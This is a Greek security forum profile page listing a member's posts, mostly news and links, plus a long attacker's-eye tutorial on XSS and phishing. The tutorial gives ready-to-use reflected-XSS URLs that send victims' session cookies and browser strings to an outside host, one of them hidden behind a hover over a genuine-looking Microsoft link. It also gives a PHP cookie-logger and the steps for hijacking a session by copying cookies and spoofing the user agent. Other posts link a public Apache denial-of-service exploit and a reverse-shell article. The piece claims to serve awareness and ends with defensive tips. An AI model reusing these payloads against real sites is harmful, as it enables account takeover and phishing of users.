Jump to content

Thiseas

root
  • Content count

    605
  • Joined

  • Last visited

About Thiseas

  • Rank
    Ninja

Previous Fields

  • Γλώσσες προγραμματισμού
    python asp.net c# VB.Net PHP System-Scripting

Contact Methods

  • Website URL
    http://www.s3cure.gr

Profile Information

  • Gender
    Male
  • Location
    Athens

Recent Profile Visitors

4,563 profile views
  1. Άσκηση κυβερνοάμυνας «Πανόπτης 2011» Συμμετείχαν οι Ένοπλες Δυνάμεις, φορείς του Δημοσίου- Ιδιωτικού τομέα και της Ακαδημαϊκής κοινότητας. Από 31 Οκτωβρίου έως 04 Νοεμβρίου 2011 πραγματοποιήθηκε η Εθνική Διακλαδική Άσκηση Κυβερνοάμυνας «ΠΑΝΟΠΤΗΣ - 2011» με τη συμμετοχή των Ενόπλων Δυνάμεων, φορέων του Δημοσίου - Ιδιωτικού τομέα και της Ακαδημαϊκής κοινότητας. Η άσκηση διοργανώθηκε και συντονίστηκε από το ΓΕΕΘΑ και σκοπός της ήταν η εξάσκηση των εμπλεκομένων, η δοκιμή των υφισταμένων σχεδίων, δομών και διαδικασιών που αφορούν στην αντιμετώπιση μειζόνων συμβάντων στον Κυβερνοχώρο καθώς και η επαύξηση του επιπέδου συνεργασίας μεταξύ των εμπλεκομένων φορέων. Πηγή
  2. My article at Hackin9 site is about to how to call a reverse shell through a DLL Injection vulnerability in Windows 7. You can download the article as well as a couple of videos about the attack, from the Hackin9 Magazine Site. A source code of a private (till the publication) reverse shell is included. I hope you like it. B)
  3. Σε ευχαριστώ για τις αναφορές. Τα 2 bugs διορθώθηκαν. Κάνε κι εσύ ένα έλεγχο και μου λες. ;)
  4. Θα ήθελα σε παρακαλώ να γίνεις λίγο πιο συγκεκριμένος και να αναφέρεις ακριβώς: 1. Τι ακριβώς πρόβλημα υπάρχει (ή θεωρείς οτι υπάρχει). 2. Ποιό είναι το ακριβές link (μιας και το site επιθέσεις δεν υπάρχει πλέον).
  5. Infosecurity Europe is the only European event that enables industry professionals to gather vital information about the latest trends and developments in IT security, exchange ideas and shop for products and services to create security solutions. Bringing together hundreds of providers showcasing the latest product and service solutions in the ever-changing IT security arena, Infosecurity Europe provides a leading platform for organisations to address constantly evolving security issues. Infosecurity Europe provides the fastest route to market and most cost effective platform to meet face-to-face, marketing-to and influencing leading IT professionals and qualified decision makers.
  6. Thiseas

    Xss Και Phishing

    Xss ή αλλιώς (Cross Site Scripting), με απλά ελληνικά είναι η εισαγωγή κώδικα μέσα σε κάποιο site με στόχο την απόκτηση πληροφοριών που δεν προορίζονται για δημοσιοποίηση. Κλασική μέθοδος στο παγκόσμιο «γίγνεσθαι» των επιθέσεων (http://tinyurl.com/yxzaoj). Ως συνήθως, όμως, μην περιμένετε σε αυτό το άρθρο να σας δώσουμε ορισμούς, υπέροχες και σημαντικές περιγραφές επιθέσεων άλλων και να τελειώσουμε παραθέτοντας τα είδη XSS. Όλα αυτά ανήκουν στην συμβατική βιβλιογραφία. Εμείς θα μπούμε στη θέση ενός επιτιθέμενου, θα δούμε πως σκέφτεται, πως δρα, και τι προγράμματα κατασκευάζει. Πριν ξεκινήσουμε, όμως, οφείλουμε να αναφέρουμε το εξής: Αρκετοί, ίσως μάλιστα πολλοί security experts δεν θεωρούν το XSS σαν απειλή. Μάλιστα, έχουμε παρατηρήσει οτι σε αρκετά sites που παρουσιάζουν αδυναμίες σε XSS και που οι διαχειριστές τους ενημερώθηκαν, δεν έκαναν τίποτε απολύτως για να καλύψουν αυτήν την «αδυναμία». Έχουν δίκιο ή άδικο; Σε αυτό το άρθρο θα προσπαθήσουμε να δώσουμε μια απάντηση σε αυτό το ερώτημα. Θα σας περιγράψουμε την μεθοδολογία που θα ακολουθήσουμε, φυσικά τεκμηριώνοντας το κάθε μας βήμα και μετά να σας δείξουμε πως θα την υλοποιήσουμε. Μια μέθοδος XSS, που μπορούμε υλοποιήσουμε, είναι να εκτελέσουμε κώδικα σε ένα site που δεν μας ανήκει και που δεν έχουμε δικαιώματα πρόσβασης εκτέλεσης κώδικα. Η εκτέλεση κώδικα, όμως, δεν είναι αυτοσκοπός. Θα αποτελέσει ένα μέσο για να πάρουμε κάποιες πληροφορίες με τις οποίες θα μπορούμε, αργότερα, να μπούμε στο site αυτό. Για να γίνει κατανοητό τι κώδικα θα εκτελέσουμε θα πρέπει να εξηγήσουμε κάποια πράγματα σε λίγο περισσότερο βάθος: Όπως είναι γνωστό το internet είναι stateless. Χμ... χιλιοειπωμένη λέξη. Τι σημαίνει όμως; Σημαίνει οτι κάθε φορά που καλούμε στον browser μας μια σελίδα από κάποιον server, αυτός (ο server) «νομίζει» οτι μας «βλέπει» για πρώτη φορά! Δεν έχει κανένα ενσωματωμένο (build-in) τρόπο να καταλάβει αν έχουμε ξαναζητήσει την σελίδα από αυτόν ή αν τον επισκεπτόμαστε πρώτη φορά στην ζωή του. Για να καταλάβετε πόσο πολύ σημαντικό είναι αυτό, σκεφτείτε το εξής παράδειγμα: Ας πούμε οτι κάνουμε εγγραφή σε ένα site. Τι κάνουμε σαν πρώτο βήμα; Δίνουμε τα στοιχεία μας, το nick μας και το password μας και ο server από την στιγμή που γραφτούμε μας... «θυμάται». Χμ... στην πραγματικότητα δεν μας θυμάται ο ίδιος αλλά η βάση δεδομένων που χρησιμοποιεί και καταχωρεί εκεί τα στοιχεία μας... Ok.. ως εδώ καλά! Κάθε φορά όμως που επισκεπτόμαστε τον site αυτό, εισάγουμε μια φορά μόνο τα στοιχεία μας (nick και password) και στην συνέχεια μπορούμε πραγματοποιήσουμε ένα σωρό από ενέργειες που επιτρέπονται μόνο σε εγγεγραμμένους χρήστες, να πατάμε σε διάφορα links χωρίς ο server να μας ρωτάει κάθε φορά τα στοιχεία μας. Κανονικά όμως, κάθε φορά που πατάμε επάνω σε ένα link που αφορά στον συγκεκριμένο server, αυτός δεν γνωρίζει αν τον έχουμε ξανασκεφτεί! Αυτό είναι το λεγόμενο stateless, και οφείλετε (εντελώς περιγραφικά) στον τρόπο που έχει κατασκευαστεί το πρωτόκολλο επικοινωνίας μεταξύ εμάς και του server (http://tinyurl.com/fwghj). Το ερώτημα, τώρα είναι, πώς ο server γνωρίζει, όχι μόνο οτι τον έχουμε ξανα-επισκεφτεί, αλλά και όλα μας τα στοιχεία (nick και password) και δεν μας τα ρωτάει κάθε φορά που κάνουμε μια ενέργεια (όπως π.χ. το να απαντήσουμε σε ένα προσωπικό μήνυμα); Προσέξτε εδώ μην μπερδευτείτε. Δεν μιλάμε για την πληροφορία οτι είμαστε εγγεγραμμένοι χρήστες του forum. Αυτή όπως είπαμε καταχωρείτε μια φορά κατά την εγγραφή μας στην βάση δεδομένων του server. Μιλάμε για τις επόμενες ενέργειες, αφού γραφτούμε! Πως ξέρει ο server οτι είμαστε εμείς που πατήσαμε ένα κουμπί και δεν είναι κάποιος άλλος, εφόσον όπως είπαμε, η «λειτουργία» του είναι stateless; Μήπως καταχωρεί κάπου αυτήν την πληροφορία; Ακριβώς,... και ποιο συγκεκριμένα την καταχωρεί στο... PC μας! Πρόκειται για τα λεγόμενα cookies ή αλλιώς, πρόκειται για τα συμπαθέστατα μπισκοτάκια. Με απλά λόγια, τα μπισκοτάκια είναι κάποια δεδομένα που καταχωρούνται, μέσω του internet browser που χρησιμοποιούμε, στον δίσκο μας και χρησιμοποιούνται από σχεδόν όλα τα sites, για να καταλάβει ο αντίστοιχος server ποιοι είμαστε. Το επόμενο ερώτημα που μπορεί να σας έρχεται στο μυαλό... ή καλύτερα, το πρώτο κατά σειρά (λέμε τώρα), είναι, τι ακριβώς καταχωρείται; Χμ... ανάλογα! (με ότι αυτό συνεπάγεται!!). Συχνά, σε sites ή forums, καταχωρείτε ένας μεγάλος δεκαδικός αριθμός ο οποίος συμβολίζει εμάς και ο server μας αναγνωρίζει μέσω αυτού. Επίσης καταχωρούνται και κάποιες άλλες πληροφορίες, όπως ημερομηνία και ώρα που μπήκαμε, η διάρκεια ζωής του «μπισκότου» και διάφορα άλλα, ανάλογα τι πληροφορίες θέλει ο server να επεξεργαστεί κατά την ταυτοποίηση μας. Τέτοια cookies ονομάζονται session cookies, δηλαδή μπισκοτάκια με... ημερομηνία λήξης και αυτό γιατί έχουν περιορισμένη διάρκεια ζωής, μέχρι να κλείσουμε τον internet browser ή αλλιώς να τερματίσουμε το session. Φανταζόμαστε οτι έχετε ήδη αναρωτηθεί τι θα γινότανε αν κάποιος... πονηρός, «έκλεβε» αυτά τα cookies και τα έβαζε στον δικό του browser: Απλά, θα έμπαινε σαν κύριος στο εκάστοτε site προσποιούμενος… εσάς! Η επίθεση αυτή είναι επίσης γνωστή σαν πλαστοπροσωπία (impersonation). Αυτός θα είναι και ο σκοπός μας. Θα προσπαθήσουμε να μπούμε σε ένα γνωστό site εύρεσης εργασίας μέσω impersonation. Για να γίνει όμως αυτό θα πρέπει να μπορέσουμε να «κλέψουμε» τα cookies κάποιου «νόμιμου» (εγγεγραμμένου) χρήστη. Εικόνα 1: Δίνοντας κώδικα javascript σε μια φόρμα αναζήτησης... Για να μπορέσει κάποιος να ανακαλύψει τα cookies κάποιου πρέπει να καταφέρει να εκτελέσει εντολές στο PC του «θύματος». Πώς όμως είναι αυτό δυνατόν; Υπάρχουν πολλοί τρόποι για να γίνει κάτι τέτοιο. Ένας αρκετά γνωστός είναι μέσω XSS. Για παράδειγμα, θα μπορoύσε κάποιος να εκτελέσει κώδικα java (javascript) μέσω του internet browser, εκμεταλλευόμενος μια αδυναμία που βρήκε στο site θύμα. Τι είδους όμως αδυναμία θα επέτρεπε κάτι τέτοιο και πώς μπορεί κάποιος να ψάξει να βρει τέτοιες αδυναμίες; Ένας αρκετά διαδεδομένος τρόπος να ψάξει κάποιος τέτοιες αδυναμίες είναι μέσω μιας φόρμας καταχώρησης στοιχείων. Για παράδειγμα, το site της εικόνας 1 μας επιτρέπει να εισάγουμε κάποια λέξεις κλειδιά για κάποια αναζήτηση εργασίας. Εμείς όμως, αντί για λέξεις κλειδιά θα εισάγουμε μια εντολή javascript για να δούμε πως θα συμπεριφερθεί ο server. Δίνουμε λοιπόν την εξής εντολή σε javascript, η οποία (αν τρέξει σωστά) θα εμφανίσει στην οθόνη μας ένα μικρό παράθυρο με το κείμενο «Hello Total Hacker». Δίνουμε λοιπόν για αναζήτηση την παρακάτω εντολή: <script>alert(“HelloTotalHacker!!”); Το αποτέλεσμα είναι οτι ο server προσπαθήσει να εμφανίσει την λέξη που δώσαμε στην αναζήτηση. Η λέξη όμως αυτή (όπως είπαμε) είναι κώδικας οπότε αν ο server δεν είναι προστατευμένος καλά, υπάρχει περίπτωση να εκτελέσει τον κώδικα αντί απλά να τον εμφανίζει. Και πράγματι το αποτέλεσμα φαίνεται στην παρακάτω εικόνα: Εικόνα 2: To αποτέλεσμα που βλέπουμε δείχνει οτι ο server έχει μια «αδυναμία» σε επιθέσεις XSS. Από εδώ και πέρα μπορούμε να εκτελέσουμε ότι javascript εντολή θέλουμε. Ακόμα και αυτήν που μας δείχνει τα cookies του user,... ναι υπάρχει τέτοια εντολή. Αν δώσουμε την παρακάτω εντολή: <script>alert(document.cookie)</script> Θα πάρουμε σαν αποτέλεσμα ένα πολύ ωραίο παράθυρο το οποίο μας δείχνει τα cookies που μας έχει δώσει ο συγκεκριμένος server (εικόνα 3). Μέχρι εδώ δεν έχουμε καταφέρει κάτι πάρα πολύ σπουδαίο. Στην καλύτερη περίπτωση βλέπουμε τα δικά μας cookies. Όμως, αν παρατηρήσετε καλά, θα διακρίνετε (με δυσκολία, διότι το έχουμε καλύψει για λόγους ασφάλειας) οτι ο κώδικας javascript εκτελείται και από το URL. Συγκεκριμένα εκτελείται η παρακάτω εντολή: http://www.ΤοΘύμα.COM/results?Search=alert(document.cookie)script> Αν η παραπάνω εντολή εκτελεστεί στον internet browser του θύματος, τότε θα εμφανίσει στην οθόνη του τα cookies του. Βέβαια αυτό δεν λέει και τίποτα μιας και αυτός που θα τα δεί θα είναι ο ιδιοκτήτης των cookies και όχι εμείς... οι κακοί! Aυτό που μένει να επιτύχουμε για να επιτύχουμε τον αρχικό σκοπό μας (που είναι να κλέψουμε τα cookies του χρήστη) είναι 2 στόχοι: Στοχος 1: Να κάνουμε την παραπάνω εντολή να εκτελεστεί στο PC του «θύματος». Στοχος 2: Να μην δείξουμε τα cookies στην οθόνη του θύματος αλλά να τα καταχωρήσουμε με κάποιο τρόπο κάπου που θα γνωρίζουμε μόνο εμείς, ενώ ο χρήστης «θύμα» δεν θα καταλάβει τίποτα! Εικόνα 3: Εδώ βλέπουμε τα cookies που μας έχει δώσει ο συκεκριμένος server. Διαδικασία επίτευξης Στόχου 1 Υπάρχουν διάφοροι τρόποι να επιτύχουμε αυτό τον στόχο. Εμείς θα επιλέξουμε αυτόν που χρησιμοποιείται πιο συχνά: Το περίφημο phishing (http://tinyurl.com/48zm2). Θα στείλουμε το «κακό» url στο θύμα μας με την μορφή link και θα περιμένουμε να το πατήσει. Όπως θα δούμε παρακάτω, πολλές φορές δεν είναι καν απαραίτητο να «πατήσει» κάπου το θύμα για να την... «πατήσει»: Μια κίνηση με το... ποντίκι είναι αρκετή για να «φάει» στο... δόλωμα! Συνήθως το URL αποστέλλεται με κάποιο mail ή εισάγεται σαν link σε κάποιον server που ο επιτιθέμενος έχει πρόσβαση. Από τη στιγμή που θα μπεί το «δόλωμα» στην «πετονιά», το μόνο που χρειάζεται από τον επιτιθέμενο είναι να περιμένει. Σας διαβεβαιώνουμε οτι θύματα θα βρεθούνε πάρα πολλά! Ανεξαρτήτου ηλικίας ή γνώσεων. Το αποτέλεσμα είναι πραγματικά εντυπωσιακό όσο αφορά στην ευκολία που μπορεί κάποιος να την «πατήσει»... (συμπεριλαμβανομένου και του... γράφοντος!!). Αυτό που θέλουμε να κάνει το URL είναι να στείλει το θύμα σε ένα link το οποίο θα του «κλέψει» τα cookies (δες επόμενη παράγραφο «Διαδικασία επίτευξης Στόχου 2»). Μπορούμε να χρησιμοποιήσουμε javascript μέσω XSS (όπως είδαμε παραπάνω) για να στείλουμε τον χρήστη σε ένα τέτοιο link (redirection). Υπάρχουν πολλοί τρόποι να συντάξουμε το «κακό» XSS που θα υλοποιεί το redirection. Εμείς προτιμάμε κάποιον από τους ακόλουθους 2: Άμεσο redirection. Πατώντας το link το θύμα οδηγείται στο κακό site μας περνώντας σαν παράμετρο τα cookies του: http://to.8yma.com/results?kAndEntire=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fkapa.freevar.com%2Ftests%2Fkakoscript1.php%3Fparam%3D%22+%2B+document.cookie%3B%3C%2Fscript%3E+&searchType=results&network=&networkView=main Έμεσο redirection. Εδώ θα μπορεί να εμφανιστεί μια αθώα σελίδα έχοντας το κακό link καλυμένο με κάποιο φαινομενικά άκακο όνομα (ας πούμε «Microsοft»;;;). Το θύμα απλά περνώντας το ποντίκι του επάνω από το link (που είναι πράγματι το link της Microsoft) την έχει πατήσει, χωρίς νε το καταλάβει. Εδώ χρειάζεται λίγη περισσότερη javascript. Αυτό που κάνει το παρακάτω javascript είναι να ελέγχει αν ο χρήστης «πέρασε» το ποντίκι του επάνω από το Link της Microsoft. Αυτό αρκεί για να εκτελεστεί ο κακός κώδικας. Δεν χρειάζεται καν να πατήσει το link - το οποίο άλλωστε οδηγεί πραγματικά στην Microsoft: http://to.8yma.com/results?kAndEntire=%3Ca+href%3D%22http%3A%2F%2Fwww.microsoft.com%22+onmouseover%3D%22javascript%3Adocument.images%5B1%5D.src%3D%27http%3A%2F%2Fkapa.freevar.com%2Ftests%2Fkakoscript2.php%3Fparam1%3D%27%2Bdocument.cookie%2B%27%26param2%3D%27%2Bnavigator.userAgent%3B%22%3EMicrosoft%3C%2Fa%3E+&searchType=results&network=&networkView=main Τα αποτελέσματα της 2ης (και πιο... κακιάς περίπτωσης) φαίνεται στην εικόνα 4. Δώστε βάση στα “kakoscript1.php” και “kakoscript2.php”. Είναι οι κλέφτες!! Θα τους αναλύσουμε αμέσως μετά. Προσέξτε επίσης τις παραμέτρους που περνιούνται στους «κλέφτες» (π.χ. στο “kakoscript2.php”): Παράμετρος 1: document.cookie (το περιεχόμενο του μπισκότου! του θύματος). Παράμετρος 2: navigator.userAgent (το όνομα του internet browser του θύματος). Οι υπόλοιπες παράμετροι που φαίνονται στο URL απαιτούνται από το συγκεκριμένο site για να λειτουργήσει σωστά η αναζήτηση. Σκεφτείτε, λοιπόν, να σας έρθει ένα mail που να δείχνει το link αυτό που δείχνει η εικόνα 4. Αυτό λοιπόν το link σας αναφέρει για μια πολύ καλή ευκαιρία στην Microsoft. Αρκεί να περάσετε το ποντίκι επάνω στο επιλεγμένο link… και τα cookies σας, αποστέλλονται στους... κακούς! Απαραίτητη προϋπόθεση να λειτουργήσει αποδοτικά κάτι τέτοιο είναι να είστε εγγεγραμμένοι σε αυτό το site και την στιγμή που πατήσετε το link να έχετε ήδη μπεί στο site σαν χρήστες (για να έχουνε ενημερωθεί τα κατάλληλα cookies). Εικόνα 4: Ένα... φαινομενικά άκακο link που οδηγεί πραγματικά στην Microsoft. Διαδικασία επίτευξης Στόχου 2 Αυτό που θα δείξουμε εδώ είναι o τρόπος που κατασκευάζονται οι κλέφτες των μπισκότων! θα χρειαστούμε ένα δικό μας server και πολύ λίγη γνώση php. Δικό μας server είναι πολύ εύκολο να βρούμε μιας και οι εταιρίες Free Web Hosting είναι εκατοντάδες. Έχοντας ένα server, το μόνο που μένει να φτιάξουμε είναι του κλέφτες, δηλαδή τα “kakoscript1.php” και “kakoscript2.php”. Θα περιγράψουμε το kakoscript2 μιας που είναι υπερσύνολο του 1. To μόνο που κάνει αυτό το script είναι να λαμβάνει ένα cookie καθώς και το όνομα του internet browser του θύματος και να τα καταχωρεί (στον κακό server) σε ένα αρχείο με το όνομα aaa.txt. <?php $biskotaki = $HTTP_GET_VARS["param1"]; // Tο... μπισκοτάκι. $browser = $HTTP_GET_VARS["param2"]; // Tο όνομα του browser. $txtfile = fopen('aaa.txt', 'a+'); // Ανοίγουμε το αρχείο. fwrite($txtfile, "-- biskotaki --------\n"); // Γράφουμε μέσα τις fwrite($txtfile, $biskotaki . "\n"); // πληροφορίες που πήραμε. fwrite($txtfile, $browser . "\n"); fwrite($txtfile, "------------------\n"); fclose($txtfile); // Κλείνουμε το αρχείο. ?> // Σας ευχαριστούμε που διαλέξατε εμάς για την... ενημέρωση σας!! Καλή σας νύχτα! Το χρονικό της επίθεσης Η «επίθεση» στο παραπάνω site έγινε ελεγχόμενα: Κάποιος φίλος έκανε εγγραφή στο συγκεκριμένο site. Μετά του στείλαμε εμείς το κακό link και εν γνώση του πάτησε σε αυτό, στέλνοντας μας τα cookies και πληροφορίες για τον Internet browser που χρησιμοποίησε. Βάζοντας εμείς τις τιμές των cookies του στα δικά μας cookies (που εμείς δεν είμαστε εγγεγραμμένοι χρήστες) μπορέσαμε να μπούμε μέσα στο site με το όνομα του φίλου μας! Αυτό, στον «φυσικό» κόσμο ονομάζετε πλαστοπροσωπία ή impersonation και φυσικά δεν θεωρείται ούτε νόμιμο ούτε έξυπνο!! Πονηρό ναι! Αλλά όχι έξυπνο. Ας αναλύσουμε λοιπόν την «επίθεση». Μόλις ο φίλος μας «τσίμπησε» το «δόλωμα» εμείς είδαμε στο aaa.txt τις εξής τιμές: Εικόνα 5: Το αρχείο κλεπταποδόχος των cookies. Στην εικόνα 5 βλέπουμε την τιμή του βασικού session cookie. Αυτή την αντιγράφουμε στα δικά μας cookies, έχοντας μπει στο ίδιο site σαν απλοί επισκέπτες! Η αντιγραφή του cookie μπορεί να γίνει πολύ εύκολα με την χρήση του add-on του firefox Web Developer Toolbar (http://tinyurl.com/2ek6ec) (εικόνα 6). Εικόνα 6: Θέτοντας τα απαραίτητα cookies «χειροκίνητα» με τον Web Developer Toolbar. Υπάρχει όμως ακόμα ένα... εμπόδιο. Βλέπουμε οτι ο φίλος μας χρησιμοποίησε Opera αντί για firefox που χρησιμοποιούμε εμείς. Αυτό το γεγονός δυσκολεύει την κατάσταση, διότι το συγκεκριμένο site είναι αρκετά έξυπνο και εξετάζει (εκτός από το session cookie) και αν ο browser έχει αλλάξει ανάμεσα σε διαδοχικές κλήσεις. Εμείς θα τον ξεγελάσουμε όμως. Χρησιμοποιώντας το add-on του firefox User Agent Switcher (http://tinyurl.com/48zm2) μπορούμε να υποδυθούμε οτι έχουμε άλλο browser από αυτόν που χρησιμοποιούμε στην πραγματικότητα (Εικόνα 7). Εικόνα 7: Με το User Agent Switcher υποδυόμαστε οτι χρησιμοποιούμε άλλο browser από αυτόν που χρησιμοποιούμε στην πραγματικότητα. Έχοντας θέσει, λοιπόν όλα τα απαραίτητα στοιχεία για να ξεγελάσουμε τον server, πατάμε απλά ένα refresh και... voila είμαστε μέσα με τα στοιχεία του φίλου μας (εικόνα 8)! Εικόνα 8: O στόχος επιτευχτεί. Μπήκαμε σαν εγγεγραμμένοι χρήστες χωρίς ποτέ να κάνουμε... login! Τρόποι προφύλαξης Τρόποι προφύλαξης υπάρχουν αρκετοί, αρκεί να είσαστε υποψιασμένοι. Ο μεγαλύτερος κίνδυνος είναι η άγνοια και η αφηρημάδα. Αν ξεπεράσετε αυτά τα «εμπόδια» μένουν λίγα βασικά πράγματα που πρέπει να κάνετε: Κοιτάτε ΠΑΝΤΑ σε τι link οδηγούν αυτά που σας στέλνουν. Αυτό πολλές φορές (όπως είδαμε) δεν είναι αρκετό, αλλά είναι ένα μικρός τρόπος προφύλαξης. Έχετε πάντα ενεργοποιημένους «μηχανισμούς» antiphishing (ο IE7 το παρέχει build-in). Έχετε πάντα ενεργοποιημένους «μηχανισμούς» που δεν επιτρέπουν εκτέλεση κώδικα javascript. Για παράδειγμα το AddIn του firefox “NoScript” (http://tinyurl.com/yov7ar) το οποίο έχει και ενσωματωμένο μηχανισμό anti-XSS θεωρούμε οτι είναι MUST!! Για να είστε σίγουροι, χρησιμοποιείτε παραπάνω του ενός internet browsers. Στον ένα θα έχετε τα “ευαίσθητα” δεδομένα σας με τα cookies τους και όλα τα καλά..., και στον άλλον θα δοκιμάζετε τα “περίεργα” Links. Αν για κάτι δεν είστε σίγουροι κάντε clear cookies και μετά εκτελέστε το περίεργο link. Ποτέ μα ΠΟΤΕ μην αναφέρετε passwords ή άλλα ευαίσθητα δεδομένα, σε e-mails. Ποτέ καμία τράπεζα δεν πρόκειται να σας ζητήσει με mail το PIN σας ή κάποιο άλλο προσωπικό σας στοιχείο! Αν λάβετε ποτέ τέτοια e-mails μπορείτε να τα καταγγείλετε στην Δίωξη Ηλεκτρονικού Εγκλήματος ( http://www.dart.gov.gr/) και φυσικά να μπλοκάρετε την διεύθυνση που σας έστειλε το mail. Συμπεράσματα Το όλο «σκηνικό» που περιγράψαμε είναι απόλυτα πραγματικό και συνέβη σε κάποιον πραγματικό server. O λόγος που επιλέξαμε αυτήν την προσέγγιση είναι για να μπορέσετε να καταλάβετε τον τρόπο που λειτουργούν οι απλοί «απατεώνες» για να σας κάνουν να τους δώσετε (χωρίς να το θέλετε) τα στοιχεία σας! Εμείς κάναμε τις δοκιμές μας σε ένα site εύρεσης εργασίας. Τα πράγματα γίνονται πάρα πολύ πιο σοβαρά όταν πρόκειται για sites τραπεζών ή οποιουδήποτε φυλάσσονται προσωπικά ή οικονομικά στοιχεία. Όλοι όσοι ισχυρίζονται οτι το XSS είναι ουσιαστικά ακίνδυνο και δεν αποτελεί πραγματικό πρόβλημα ασφάλειας, θα τους παρακαλούσαμε να το ξανασκεφτούν. Εάν δεν το καταλαβαίνουν όμως, τουλάχιστον ας μην το αναφέρουν δεξιά αριστερά «ξεγελώντας» πολλές φορές (χωρίς να το θέλουν;;!) ανθρώπους που δεν γνωρίζουν. Η ηλεκτρονική απάτη δεν διαφέρει σε τίποτα από οποιαδήποτε άλλη απάτη, όπως και ο ηλεκτρονικός κλέφτης δεν διαφέρει σε τίποτα από τον κοινό διαρρήκτη ή απατεώνα του δρόμου! Ο στόχος μας ήτανε και είναι πάντα να σας μάθουμε πως σκέφτονται και πως κινούνται αυτοί για να είσαστε υποψιασμένοι!!
  7. Microsoft Publisher 2007 Pubconv.dll Memory Corruption Microsoft Publisher is a desktop publishing application from Microsoft that uses a proprietary file format (.pub). A vulnerability has been found in Publisher 2007, that can be leveraged by an attacker to execute arbitrary code by enticing users to insert a specially-crafted .pub file into a document. Credits This vulnerability was discovered and researched by Daniel Kazimirow from Core Security Technologies. Read more on Source.
  8. Thiseas

    My Presentation In Athcon 2010

    ok... Link updated! Thanks!
  9. Καλός είναι ο Onion Router αλλά είναι λίγο αργός βρε παιδί μου... B) Υπάρχει και η λύση VPN ή SSH Tunneling.
  10. Πολύ ωραία και καλά κάνεις και μας το λες. Έτσι πρέπει. Δεν είναι κακό που εμπνεύστηκες κάποιες ιδέες από αλλού. Αυτό όμως που συνίσταται σε αυτές τις περιπτώσεις είναι να αναφέρεις και κάπου μέσα στο άρθρο σου (συνήθως στην αρχή) την αρχική σου πηγή. Έτσι πρέπει. @ mortisgr: Ευχαριστούμε για την επισήμανση. Ξέρετε, έχουμε μια ιδιαίτερη ευαισθησία σε κάτι τέτοια ;)
  11. Thiseas

    Apache Killer Is Public

    Apache Killer by KingCope The recently (2011) private remote Denial Of Services exploit for Apache, the well known Apache Killer by KingCope, is now public. You can study it here: http://pastebin.com/9y9Atijn
  12. A very useful cheat-sheet about the most used ports is in the following pdf: By packetlife.net
  13. Dear members and friends, we would like to announce that registrations are now open. Guests cannot view main section and tools section anymore. In addition, be prepared for new content! Thank you all [The s3cure.Team]
  14. Lectures: You can download the Thiseas' lecture of the 1st unnauthorized meeting that take place at Sun 12 Jun 2011 at HackerSpace from here: Lecture 1 : Session Hijacking - Athcon 2010.
×